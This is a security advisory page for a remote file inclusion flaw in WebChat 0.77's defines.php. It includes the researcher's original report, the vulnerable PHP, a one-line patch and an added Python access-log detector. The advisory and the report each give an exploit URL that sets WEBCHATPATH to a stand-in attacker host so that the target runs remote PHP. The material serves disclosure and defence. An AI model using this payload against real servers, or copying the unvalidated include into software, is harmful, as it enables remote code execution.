SecurityTracker.com
Category:   Application (Instant Messaging/IRC/Chat)  >   WebChat (webdev.ro)
Vendors:   Toma, Daniel
WebChat Include File Bug in 'defines.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1006193
SecurityTracker URL:  http://securitytracker.com/id/1006193
CVE Reference:   CVE-2007-0485
Updated:  Jul 7 2008
Original Entry Date:  Mar 3 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.77
Description:   An include file vulnerability was reported in WebChat. A remote user can execute arbitrary PHP code and operating system commands on the target server.

Frog-m@n reported that the 'defines.php' script includes the 'db_mysql.php' and 'language/english.php' files relative to the $WEBCHATPATH variable but does not validate that the included files are from the proper location. A remote user can specify a remote location for those include files, causing the target server to include and execute the remotely located files.

As an example, the following URL will cause the http://[attacker]/db_mysql.php file to be executed on the target server:

http://[target]/defines.php?WEBCHATPATH=http://[attacker]/

According to the report, this exploit is possible only if the register_globals parameter is set to ON.
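
A log check for the request pattern described above, as an added example that is not part of the original advisory or report: it scans web-server access logs for requests that set WEBCHATPATH in the query string and marks URL-style values. The log lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines; clients, hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Mar/2003:22:10:01 -0500] "GET /webchat/defines.php?WEBCHATPATH=http://files.example/ HTTP/1.0" 200 512
203.0.113.7 - - [02/Mar/2003:22:10:05 -0500] "GET /webchat/defines.php?WEBCHATPATH=hTTp%3A%2F%2Ffiles.example%2F HTTP/1.0" 200 512
198.51.100.4 - - [02/Mar/2003:22:11:40 -0500] "GET /webchat/index.php?room=1 HTTP/1.0" 200 2048
198.51.100.9 - - [02/Mar/2003:22:12:02 -0500] "GET /webchat/defines.php?WEBCHATPATH=./ HTTP/1.0" 200 512
"""

# Client address and request target from a common/combined log format line.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A URL scheme ("http:") or a network-path reference ("//host/").
URL_LIKE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+:|//)", re.I)


def classify(value):
    """Return 'remote' for URL-style values, 'other' for any other override."""
    for _ in range(3):  # undo repeated percent-encoding before matching
        value = unquote(value)
    return "remote" if URL_LIKE.match(value) else "other"


def find_overrides(log_text, param="WEBCHATPATH"):
    """List (client, path, kind, value) for each request that sets `param`.

    Access logs record only the query string, so this covers requests shaped
    like the URL in the advisory.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # PHP variable names are case-sensitive, so the name is matched exactly.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        hits.extend((client, url.path, classify(v), v) for v in values)
    return hits


if __name__ == "__main__":
    for hit in find_overrides(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Any hit is worth reviewing, since the patch in the report fixes the value to './' inside the script and so nothing legitimate depends on the request supplying it.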

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target server. The code or commands will run with the privileges of the web server.
Solution:   No vendor solution was available at the time of this entry. The author of the report has issued an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  www.webdev.ro/products/webchat/
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Sun, 02 Mar 2003 22:56:18 -0500
Subject:  WebChat


						WebChat
						*******
Information:
°°°°°°°°°°°°
Language: PHP
Website: http://www.webdev.ro
Version: 0.77
Problem: File inclusion

Development:
°°°°°°°°°°°°
WebChat is a simple open-source chat that has existed for a few years.

The flaw is fairly classic.
In the file defines.php, we can see these lines of code:
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------
It is therefore possible to include and execute the files http://[attacker]/db_mysql.php and
http://[attacker]/language/english.php in the file http://[target]/defines.php, using a URL
such as:
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
These files located on http://[attacker] will then be executed as PHP code on the
server http://[target],
with its rights and restrictions.
All of this is only possible if register_globals is set to ON.

Patch:
°°°°°°
In defines.php, replace the lines:
-----------------------------
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
-----------------------------
with:
--------------------
$WEBCHATPATH = './';
--------------------

A patch can be found at http://www.phpsecure.info.

Credits:
°°°°°°°°
Author: frog-m@n
E-mail: frog-man@frog-man.org
Website: http://www.phpsecure.info
Date: 01/03/03


 
 



Copyright 2014, SecurityGlobal.net LLC